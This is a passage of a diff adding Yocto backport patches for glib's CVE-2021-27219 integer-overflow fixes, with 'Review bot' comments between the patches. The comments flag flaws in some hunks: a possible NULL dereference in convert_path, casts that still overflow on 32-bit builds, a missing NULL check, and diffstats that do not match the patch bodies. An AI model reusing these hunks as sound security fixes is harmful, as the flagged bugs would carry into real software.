85@@ -112,7 +113,7 @@ g_dir_open_with_errno (const gchar *path
86 return NULL;
87 #endif
88
89- return g_memdup (&dir, sizeof dir);
90+ return g_memdup2 (&dir, sizeof dir);
91 }
92
93 /**
94--- a/glib/ghash.c
95+++ b/glib/ghash.c
96@@ -34,6 +34,7 @@
97 #include "gmacros.h"
98 #include "glib-private.h"
99 #include "gstrfuncs.h"
100+#include "gstrfuncsprivate.h"
101 #include "gatomic.h"
102 #include "gtestutils.h"
103 #include "gslice.h"
104@@ -962,7 +963,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
105 if (hash_table->have_big_keys)
106 {
107 if (key != value)
108- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
109+ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
110 /* Keys and values are both big now, so no need for further checks */
111 return;
112 }
113@@ -970,7 +971,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
114 {
115 if (key != value)
116 {
117- hash_table->values = g_memdup (hash_table->keys, sizeof (guint) * hash_table->size);
118+ hash_table->values = g_memdup2 (hash_table->keys, sizeof (guint) * hash_table->size);
119 is_a_set = FALSE;
120 }
121 }
122@@ -998,7 +999,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
123
124 /* Just split if necessary */
125 if (is_a_set && key != value)
126- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
127+ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
128
129 #endif
130 }
131--- a/glib/giochannel.c
132+++ b/glib/giochannel.c
133@@ -35,7 +35,7 @@
134 #include <errno.h>
135
136 #include "giochannel.h"
137-
138+#include "gstrfuncsprivate.h"
139 #include "gstrfuncs.h"
140 #include "gtestutils.h"
141 #include "glibintl.h"
142
143@@ -1673,10 +1674,10 @@ g_io_channel_read_line (GIOChannel *cha
144
145 /* Copy the read bytes (including any embedded nuls) and nul-terminate.
146 * `USE_BUF (channel)->str` is guaranteed to be nul-terminated as it’s a
147- * #GString, so it’s safe to call g_memdup() with +1 length to allocate
148+ * #GString, so it’s safe to call g_memdup2() with +1 length to allocate
149 * a nul-terminator. */
150 g_assert (USE_BUF (channel));
151- line = g_memdup (USE_BUF (channel)->str, got_length + 1);
152+ line = g_memdup2 (USE_BUF (channel)->str, got_length + 1);
153 line[got_length] = '\0';
154 *str_return = g_steal_pointer (&line);
155 g_string_erase (USE_BUF (channel), 0, got_length);
156--- a/glib/gslice.c
157+++ b/glib/gslice.c
158@@ -41,6 +41,7 @@
159 #include "gmain.h"
160 #include "gmem.h" /* gslice.h */
161 #include "gstrfuncs.h"
162+#include "gstrfuncsprivate.h"
163 #include "gutils.h"
164 #include "gtrashstack.h"
165 #include "gtestutils.h"
166@@ -350,7 +351,7 @@ g_slice_get_config_state (GSliceConfig c
167 array[i++] = allocator->contention_counters[address];
168 array[i++] = allocator_get_magazine_threshold (allocator, address);
169 *n_values = i;
170- return g_memdup (array, sizeof (array[0]) * *n_values);
171+ return g_memdup2 (array, sizeof (array[0]) * *n_values);
172 default:
173 return NULL;
174 }
175--- a/glib/gtestutils.c
176+++ b/glib/gtestutils.c
177@@ -49,6 +49,7 @@
178 #include "gpattern.h"
179 #include "grand.h"
180 #include "gstrfuncs.h"
181+#include "gstrfuncsprivate.h"
182 #include "gtimer.h"
183 #include "gslice.h"
184 #include "gspawn.h"
185@@ -3803,7 +3804,7 @@ g_test_log_extract (GTestLogBuffer *tbuf
186 if (p <= tbuffer->data->str + mlength)
187 {
188 g_string_erase (tbuffer->data, 0, mlength);
189- tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup (&msg, sizeof (msg)));
190+ tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup2 (&msg, sizeof (msg)));
191 return TRUE;
192 }
193
194--- a/glib/gvariant.c
195+++ b/glib/gvariant.c
196@@ -33,6 +33,7 @@
197
198 #include <string.h>
199
200+#include "gstrfuncsprivate.h"
201
202 /**
203 * SECTION:gvariant
204@@ -725,7 +726,7 @@ g_variant_new_variant (GVariant *value)
205 g_variant_ref_sink (value);
206
207 return g_variant_new_from_children (G_VARIANT_TYPE_VARIANT,
208- g_memdup (&value, sizeof value),
209+ g_memdup2 (&value, sizeof value),
210 1, g_variant_is_trusted (value));
211 }
212
213@@ -1229,7 +1230,7 @@ g_variant_new_fixed_array (const GVarian
214 return NULL;
215 }
216
217- data = g_memdup (elements, n_elements * element_size);
218+ data = g_memdup2 (elements, n_elements * element_size);
219 value = g_variant_new_from_data (array_type, data,
220 n_elements * element_size,
221 FALSE, g_free, data);
222@@ -1908,7 +1909,7 @@ g_variant_dup_bytestring (GVariant *valu
223 if (length)
224 *length = size;
225
226- return g_memdup (original, size + 1);
227+ return g_memdup2 (original, size + 1);
228 }
229
230 /**
231--- a/glib/gvarianttype.c
232+++ b/glib/gvarianttype.c
233@@ -28,6 +28,7 @@
234
235 #include <string.h>
236
237+#include "gstrfuncsprivate.h"
238
239 /**
240 * SECTION:gvarianttype
241@@ -1181,7 +1182,7 @@ g_variant_type_new_tuple (const GVariant
242 g_assert (offset < sizeof buffer);
243 buffer[offset++] = ')';
244
245- return (GVariantType *) g_memdup (buffer, offset);
246+ return (GVariantType *) g_memdup2 (buffer, offset);
247 }
248
249 /**
250--- a/glib/tests/array-test.c
251+++ b/glib/tests/array-test.c
252@@ -29,6 +29,8 @@
253 #include <string.h>
254 #include "glib.h"
255
256+#include "gstrfuncsprivate.h"
257+
258 /* Test data to be passed to any function which calls g_array_new(), providing
259 * the parameters for that call. Most #GArray tests should be repeated for all
260 * possible values of #ArrayTestData. */
261@@ -1917,7 +1919,7 @@ byte_array_new_take (void)
262 GByteArray *gbarray;
263 guint8 *data;
264
265- data = g_memdup ("woooweeewow", 11);
266+ data = g_memdup2 ("woooweeewow", 11);
267 gbarray = g_byte_array_new_take (data, 11);
268 g_assert (gbarray->data == data);
269 g_assert_cmpuint (gbarray->len, ==, 11);
270--- a/glib/tests/option-context.c
271+++ b/glib/tests/option-context.c
272@@ -27,6 +27,8 @@
273 #include <string.h>
274 #include <locale.h>
275
276+#include "gstrfuncsprivate.h"
277+
278 static GOptionEntry main_entries[] = {
279 { "main-switch", 0, 0,
280 G_OPTION_ARG_NONE, NULL,
281@@ -256,7 +258,7 @@ join_stringv (int argc, char **argv)
282 static char **
283 copy_stringv (char **argv, int argc)
284 {
285- return g_memdup (argv, sizeof (char *) * (argc + 1));
286+ return g_memdup2 (argv, sizeof (char *) * (argc + 1));
287 }
288
289 static void
290@@ -2323,7 +2325,7 @@ test_group_parse (void)
291 g_option_context_add_group (context, group);
292
293 argv = split_string ("program --test arg1 -f arg2 --group-test arg3 --frob arg4 -z arg5", &argc);
294- orig_argv = g_memdup (argv, (argc + 1) * sizeof (char *));
295+ orig_argv = g_memdup2 (argv, (argc + 1) * sizeof (char *));
296
297 retval = g_option_context_parse (context, &argc, &argv, &error);
298
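Review bot: The diffstat lists `glib/tests/uri.c | 8 +++++---` and counts 11 files, but the patch body ends with the glib/tests/option-context.c hunks and carries no hunk for uri.c, so the record and the content disagree. For a patch tagged `CVE: CVE-2021-27219` this makes the backport harder to audit against the upstream commit it names. The header already says `Backport of:`; a line under it such as `Dropped the glib/tests/uri.c hunk (<reason>)`, with the diffstat regenerated, would document the deviation. The giochannel.c section looks hand-edited as well: its first hunk header is `@@ -35,7 +35,7 @@` (no net line change) while the next is `@@ -1673,10 +1674,10 @@`.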
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
new file mode 100644
index 0000000000..4f86522d00
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
@@ -0,0 +1,54 @@
1From 0cbad673215ec8a049b7fe2ff44b0beed31b376e Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 16:12:24 +0000
4Subject: [PATCH 05/11] gwinhttpfile: Avoid arithmetic overflow when
5 calculating a size
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10The members of `URL_COMPONENTS` (`winhttp_file->url`) are `DWORD`s, i.e.
1132-bit unsigned integers. Adding to and multiplying them may cause them
12to overflow the unsigned integer bounds, even if the result is passed to
13`g_memdup2()` which accepts a `gsize`.
14
15Cast the `URL_COMPONENTS` members to `gsize` first to ensure that the
16arithmetic is done in terms of `gsize`s rather than unsigned integers.
17
18Spotted by Sebastian Dröge.
19
20Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
21Helps: #2319
22
23Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
24CVE: CVE-2021-27219
25Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
26Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
27
28---
29 gio/win32/gwinhttpfile.c | 8 ++++----
30 1 file changed, 4 insertions(+), 4 deletions(-)
31
32diff --git a/gio/win32/gwinhttpfile.c b/gio/win32/gwinhttpfile.c
33index 3f8fbd838..e0340e247 100644
34--- a/gio/win32/gwinhttpfile.c
35+++ b/gio/win32/gwinhttpfile.c
36@@ -410,10 +410,10 @@ g_winhttp_file_resolve_relative_path (GFile *file,
37 child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
38 child->vfs = winhttp_file->vfs;
39 child->url = winhttp_file->url;
40- child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
41- child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
42- child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
43- child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
44+ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, ((gsize) winhttp_file->url.dwSchemeLength + 1) * 2);
45+ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, ((gsize) winhttp_file->url.dwHostNameLength + 1) * 2);
46+ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, ((gsize) winhttp_file->url.dwUserNameLength + 1) * 2);
47+ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, ((gsize) winhttp_file->url.dwPasswordLength + 1) * 2);
48 child->url.lpszUrlPath = wnew_path;
49 child->url.dwUrlPathLength = wcslen (wnew_path);
50 child->url.lpszExtraInfo = NULL;
51--
52GitLab
53
54
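Review bot: The `(gsize)` casts in the four `g_memdup2 (...)` calls only help where gsize is wider than DWORD; on a 32-bit Windows build gsize is also 32 bits, so `((gsize) winhttp_file->url.dwSchemeLength + 1) * 2` can still wrap for a large length. Patch 07 of this series guards the same kind of computation with `g_assert (str_len_unsigned <= G_MAXSIZE / sizeof (gunichar2) - 1);`. An equivalent check per field here, for example `g_assert (winhttp_file->url.dwSchemeLength <= G_MAXSIZE / 2 - 1);`, would close the gap. The enclosing g_winhttp_file_resolve_relative_path starts and ends outside the hunk, so whether the lengths are bounded earlier is not visible.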
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
new file mode 100644
index 0000000000..d8043f5e29
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
@@ -0,0 +1,101 @@
1From f9ee2275cbc312c0b4cdbc338a4fbb76eb36fb9a Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 13:49:00 +0000
4Subject: [PATCH 06/11] gdatainputstream: Handle stop_chars_len internally as
5 gsize
6
7Previously it was handled as a `gssize`, which meant that if the
8`stop_chars` string was longer than `G_MAXSSIZE` there would be an
9overflow.
10
11Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
12Helps: #2319
13
14Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
15CVE: CVE-2021-27219
16Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
17Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
18
19---
20 gio/gdatainputstream.c | 25 +++++++++++++++++--------
21 1 file changed, 17 insertions(+), 8 deletions(-)
22
23diff --git a/gio/gdatainputstream.c b/gio/gdatainputstream.c
24index 2e7750cb5..2cdcbda19 100644
25--- a/gio/gdatainputstream.c
26+++ b/gio/gdatainputstream.c
27@@ -27,6 +27,7 @@
28 #include "gioenumtypes.h"
29 #include "gioerror.h"
30 #include "glibintl.h"
31+#include "gstrfuncsprivate.h"
32
33 #include <string.h>
34
35@@ -856,7 +857,7 @@ static gssize
36 scan_for_chars (GDataInputStream *stream,
37 gsize *checked_out,
38 const char *stop_chars,
39- gssize stop_chars_len)
40+ gsize stop_chars_len)
41 {
42 GBufferedInputStream *bstream;
43 const char *buffer;
44@@ -952,7 +953,7 @@ typedef struct
45 gsize checked;
46
47 gchar *stop_chars;
48- gssize stop_chars_len;
49+ gsize stop_chars_len;
50 gsize length;
51 } GDataInputStreamReadData;
52
53@@ -1078,12 +1079,17 @@ g_data_input_stream_read_async (GDataInputStream *stream,
54 {
55 GDataInputStreamReadData *data;
56 GTask *task;
57+ gsize stop_chars_len_unsigned;
58
59 data = g_slice_new0 (GDataInputStreamReadData);
60- if (stop_chars_len == -1)
61- stop_chars_len = strlen (stop_chars);
62- data->stop_chars = g_memdup (stop_chars, stop_chars_len);
63- data->stop_chars_len = stop_chars_len;
64+
65+ if (stop_chars_len < 0)
66+ stop_chars_len_unsigned = strlen (stop_chars);
67+ else
68+ stop_chars_len_unsigned = (gsize) stop_chars_len;
69+
70+ data->stop_chars = g_memdup2 (stop_chars, stop_chars_len_unsigned);
71+ data->stop_chars_len = stop_chars_len_unsigned;
72 data->last_saw_cr = FALSE;
73
74 task = g_task_new (stream, cancellable, callback, user_data);
75@@ -1338,17 +1344,20 @@ g_data_input_stream_read_upto (GDataInputStream *stream,
76 gssize found_pos;
77 gssize res;
78 char *data_until;
79+ gsize stop_chars_len_unsigned;
80
81 g_return_val_if_fail (G_IS_DATA_INPUT_STREAM (stream), NULL);
82
83 if (stop_chars_len < 0)
84- stop_chars_len = strlen (stop_chars);
85+ stop_chars_len_unsigned = strlen (stop_chars);
86+ else
87+ stop_chars_len_unsigned = (gsize) stop_chars_len;
88
89 bstream = G_BUFFERED_INPUT_STREAM (stream);
90
91 checked = 0;
92
93- while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len)) == -1)
94+ while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len_unsigned)) == -1)
95 {
96 if (g_buffered_input_stream_get_available (bstream) ==
97 g_buffered_input_stream_get_buffer_size (bstream))
98--
99GitLab
100
101
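Review bot: In the g_data_input_stream_read_upto hunk the only precondition before `stop_chars_len_unsigned = strlen (stop_chars);` is the `G_IS_DATA_INPUT_STREAM` check, so a NULL `stop_chars` with a negative length reaches strlen(). Since the patch already reworks the length handling, add `g_return_val_if_fail (stop_chars != NULL || stop_chars_len == 0, NULL);` next to the existing check. The same negative-length conversion is duplicated in g_data_input_stream_read_async; its callers are outside the hunk, so whether NULL can arrive there with a negative length is not visible.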
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
new file mode 100644
index 0000000000..f183939c45
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
@@ -0,0 +1,76 @@
1From 2aaf593a9eb96d84fe3be740aca2810a97d95592 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 13:50:37 +0000
4Subject: [PATCH 07/11] gwin32: Use gsize internally in g_wcsdup()
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9This allows it to handle strings up to length `G_MAXSIZE` — previously
10it would overflow with such strings.
11
12Update the several copies of it identically.
13
14Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
15Helps: #2319
16
17Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
18CVE: CVE-2021-27219
19Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
20Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
21
22---
23 gio/gwin32registrykey.c | 34 ++++++++++++++++++++++++++--------
24 2 files changed, 38 insertions(+), 16 deletions(-)
25
26diff --git a/gio/gwin32registrykey.c b/gio/gwin32registrykey.c
27index 548a94188..2eb67daf8 100644
28--- a/gio/gwin32registrykey.c
29+++ b/gio/gwin32registrykey.c
30@@ -127,16 +127,34 @@ typedef enum
31 G_WIN32_REGISTRY_UPDATED_PATH = 1,
32 } GWin32RegistryKeyUpdateFlag;
33
34+static gsize
35+g_utf16_len (const gunichar2 *str)
36+{
37+ gsize result;
38+
39+ for (result = 0; str[0] != 0; str++, result++)
40+ ;
41+
42+ return result;
43+}
44+
45 static gunichar2 *
46-g_wcsdup (const gunichar2 *str,
47- gssize str_size)
48+g_wcsdup (const gunichar2 *str, gssize str_len)
49 {
50- if (str_size == -1)
51- {
52- str_size = wcslen (str) + 1;
53- str_size *= sizeof (gunichar2);
54- }
55- return g_memdup (str, str_size);
56+ gsize str_len_unsigned;
57+ gsize str_size;
58+
59+ g_return_val_if_fail (str != NULL, NULL);
60+
61+ if (str_len < 0)
62+ str_len_unsigned = g_utf16_len (str);
63+ else
64+ str_len_unsigned = (gsize) str_len;
65+
66+ g_assert (str_len_unsigned <= G_MAXSIZE / sizeof (gunichar2) - 1);
67+ str_size = (str_len_unsigned + 1) * sizeof (gunichar2);
68+
69+ return g_memdup2 (str, str_size);
70 }
71
72 /**
73--
74GitLab
75
76
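Review bot: g_wcsdup()'s second parameter changes meaning, not just name: the old `str_size` was a byte count handed straight to g_memdup(), while the new `str_len` is treated as a count of gunichar2 units and turned into `(str_len_unsigned + 1) * sizeof (gunichar2)` bytes. The call sites are outside this hunk; any that still pass a byte size would now make g_memdup2() copy more than twice that many bytes from the source buffer. The function should carry a comment stating the unit, for example `/* str_len: length in gunichar2 units, excluding the terminator; negative means nul-terminated */`, and each caller should be checked against it. The diffstat also reports `2 files changed, 38 insertions(+), 16 deletions(-)` while listing and patching only gio/gwin32registrykey.c, and the message says several copies were updated, so the dropped file should be named in the backport header.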
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
new file mode 100644
index 0000000000..ffafc35c07
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
@@ -0,0 +1,101 @@
1From ba8ca443051f93a74c0d03d62e70402036f967a5 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Thu, 4 Feb 2021 13:58:32 +0000
4Subject: [PATCH 08/11] gkeyfilesettingsbackend: Handle long keys when
5 converting paths
6
7Previously, the code in `convert_path()` could not handle keys longer
8than `G_MAXINT`, and would overflow if that was exceeded.
9
10Convert the code to use `gsize` and `g_memdup2()` throughout, and
11change from identifying the position of the final slash in the string
12using a signed offset `i`, to using a pointer to the character (and
13`strrchr()`). This allows the slash to be at any position in a
14`G_MAXSIZE`-long string, without sacrificing a bit of the offset for
15indicating whether a slash was found.
16
17Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
18Helps: #2319
19
20Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
21CVE: CVE-2021-27219
22Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
23Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
24
25---
26 gio/gkeyfilesettingsbackend.c | 21 ++++++++++-----------
27 1 file changed, 10 insertions(+), 11 deletions(-)
28
29diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
30index cd5765afd..25b057672 100644
31--- a/gio/gkeyfilesettingsbackend.c
32+++ b/gio/gkeyfilesettingsbackend.c
33@@ -33,6 +33,7 @@
34 #include "gfilemonitor.h"
35 #include "gsimplepermission.h"
36 #include "gsettingsbackendinternal.h"
37+#include "gstrfuncsprivate.h"
38 #include "giomodule-priv.h"
39 #include "gportalsupport.h"
40
41@@ -145,8 +146,8 @@ convert_path (GKeyfileSettingsBackend *kfsb,
42 gchar **group,
43 gchar **basename)
44 {
45- gint key_len = strlen (key);
46- gint i;
47+ gsize key_len = strlen (key);
48+ const gchar *last_slash;
49
50 if (key_len < kfsb->prefix_len ||
51 memcmp (key, kfsb->prefix, kfsb->prefix_len) != 0)
52@@ -155,38 +156,36 @@ convert_path (GKeyfileSettingsBackend *kfsb,
53 key_len -= kfsb->prefix_len;
54 key += kfsb->prefix_len;
55
56- for (i = key_len; i >= 0; i--)
57- if (key[i] == '/')
58- break;
59+ last_slash = strrchr (key, '/');
60
61 if (kfsb->root_group)
62 {
63 /* if a root_group was specified, make sure the user hasn't given
64 * a path that ghosts that group name
65 */
66- if (i == kfsb->root_group_len && memcmp (key, kfsb->root_group, i) == 0)
67+ if (last_slash != NULL && (last_slash - key) == kfsb->root_group_len && memcmp (key, kfsb->root_group, last_slash - key) == 0)
68 return FALSE;
69 }
70 else
71 {
72 /* if no root_group was given, ensure that the user gave a path */
73- if (i == -1)
74+ if (last_slash == NULL)
75 return FALSE;
76 }
77
78 if (group)
79 {
80- if (i >= 0)
81+ if (last_slash != NULL)
82 {
83- *group = g_memdup (key, i + 1);
84- (*group)[i] = '\0';
85+ *group = g_memdup2 (key, (last_slash - key) + 1);
86+ (*group)[(last_slash - key)] = '\0';
87 }
88 else
89 *group = g_strdup (kfsb->root_group);
90 }
91
92 if (basename)
93- *basename = g_memdup (key + i + 1, key_len - i);
94+ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
95
96 return TRUE;
97 }
98--
99GitLab
100
101
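Review bot: The last changed line of convert_path, the `*basename = g_memdup2 (last_slash + 1, ...)` assignment, runs even when `last_slash` is NULL, which the code above allows when `kfsb->root_group` is set and the key contains no slash. The old loop left `i == -1` in that case, so `g_memdup (key + i + 1, key_len - i)` copied the whole key with its terminator; the new expression does pointer arithmetic on NULL and derives the length from it. The basename branch needs the same `last_slash != NULL` test the group branch already has, falling back to a plain copy of `key`. Whether a later patch in the series restores this is not visible here, and convert_path's signature starts outside the hunk.

```c
/* … unchanged: prefix check, root_group check, group copy … */
  if (basename)
    {
      if (last_slash != NULL)
        *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
      else
        *basename = g_strdup (key);
    }
```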
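diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
new file mode 100644
index 0000000000..8efb7c720f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
@@ -0,0 +1,100 @@
+From 65ec7f4d6e8832c481f6e00e2eb007b9a60024ce Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:00:53 +0000
+Subject: [PATCH 09/11] =?UTF-8?q?gsocket:=20Use=20gsize=20to=20track=20nat?=
+ =?UTF-8?q?ive=20sockaddr=E2=80=99s=20size?=
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Don’t use an `int`, that’s potentially too small. In practical terms,
+this is not a problem, since no socket address is going to be that big.
+
+By making these changes we can use `g_memdup2()` without warnings,
+though. Fewer warnings is good.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gsocket.c | 16 ++++++++++------
+ 1 file changed, 10 insertions(+), 6 deletions(-)
+
+--- a/gio/gsocket.c
++++ b/gio/gsocket.c
+@@ -75,6 +75,7 @@
+ #include "gcredentialsprivate.h"
+ #include "glibintl.h"
+ #include "gioprivate.h"
++#include "gstrfuncsprivate.h"
+
+ #ifdef G_OS_WIN32
+ /* For Windows XP runtime compatibility, but use the system's if_nametoindex() if available */
+@@ -174,7 +175,7 @@ static gboolean g_socket_datagram_ba
+ GError **error);
+
+ static GSocketAddress *
+-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len);
++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len);
+
+ static gssize
+ g_socket_receive_message_with_timeout (GSocket *socket,
+@@ -260,7 +261,7 @@ struct _GSocketPrivate
+ struct {
+ GSocketAddress *addr;
+ struct sockaddr *native;
+- gint native_len;
++ gsize native_len;
+ guint64 last_used;
+ } recv_addr_cache[RECV_ADDR_CACHE_SIZE];
+ };
+@@ -5259,14 +5260,14 @@ g_socket_send_messages_with_timeout (GSo
+ }
+
+ static GSocketAddress *
+-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len)
++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len)
+ {
+ GSocketAddress *saddr;
+ gint i;
+ guint64 oldest_time = G_MAXUINT64;
+ gint oldest_index = 0;
+
+- if (native_len <= 0)
++ if (native_len == 0)
+ return NULL;
+
+ saddr = NULL;
+@@ -5274,7 +5275,7 @@ cache_recv_address (GSocket *socket, str
+ {
+ GSocketAddress *tmp = socket->priv->recv_addr_cache[i].addr;
+ gpointer tmp_native = socket->priv->recv_addr_cache[i].native;
+- gint tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
++ gsize tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
+
+ if (!tmp)
+ continue;
+@@ -5304,7 +5305,7 @@ cache_recv_address (GSocket *socket, str
+ g_free (socket->priv->recv_addr_cache[oldest_index].native);
+ }
+
+- socket->priv->recv_addr_cache[oldest_index].native = g_memdup (native, native_len);
++ socket->priv->recv_addr_cache[oldest_index].native = g_memdup2 (native, native_len);
+ socket->priv->recv_addr_cache[oldest_index].native_len = native_len;
+ socket->priv->recv_addr_cache[oldest_index].addr = g_object_ref (saddr);
+ socket->priv->recv_addr_cache[oldest_index].last_used = g_get_monotonic_time ();
+@@ -5452,6 +5453,9 @@ g_socket_receive_message_with_timeout (G
+ /* do it */
+ while (1)
+ {
++ /* addrlen has to be of type int because that’s how WSARecvFrom() is defined */
++ G_STATIC_ASSERT (sizeof addr <= G_MAXINT);
++
+ addrlen = sizeof addr;
+ if (address)
+ result = WSARecvFrom (socket->priv->fd,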
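Review bot: Widening `native_len` to `size_t` in `cache_recv_address()` drops the old rejection of negative lengths: `if (native_len == 0)` no longer catches a negative `int` that a caller converts implicitly, and such a value would reach `g_memdup2 (native, native_len)` as a very large size. The call sites are outside this patch, so this is inferred; it is worth confirming that every caller passes only a length reported by a successful receive, and stating that above the function, e.g. `/* native_len must come from a successful recvfrom()/recvmsg()/WSARecvFrom() */`. The prototype and definition also use `size_t` while the cache struct and the local use `gsize`; `gsize native_len` in both would match the rest of the patch.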
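diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
new file mode 100644
index 0000000000..63fda0b600
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
@@ -0,0 +1,59 @@
+From 777b95a88f006d39d9fe6d3321db17e7b0d4b9a4 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:07:39 +0000
+Subject: [PATCH 10/11] gtlspassword: Forbid very long TLS passwords
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The public API `g_tls_password_set_value_full()` (and the vfunc it
+invokes) can only accept a `gssize` length. Ensure that nul-terminated
+strings passed to `g_tls_password_set_value()` can’t exceed that length.
+Use `g_memdup2()` to avoid an overflow if they’re longer than
+`G_MAXUINT` similarly.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gtlspassword.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
+index 1e437a7b6..dbcec41a8 100644
+--- a/gio/gtlspassword.c
++++ b/gio/gtlspassword.c
+@@ -23,6 +23,7 @@
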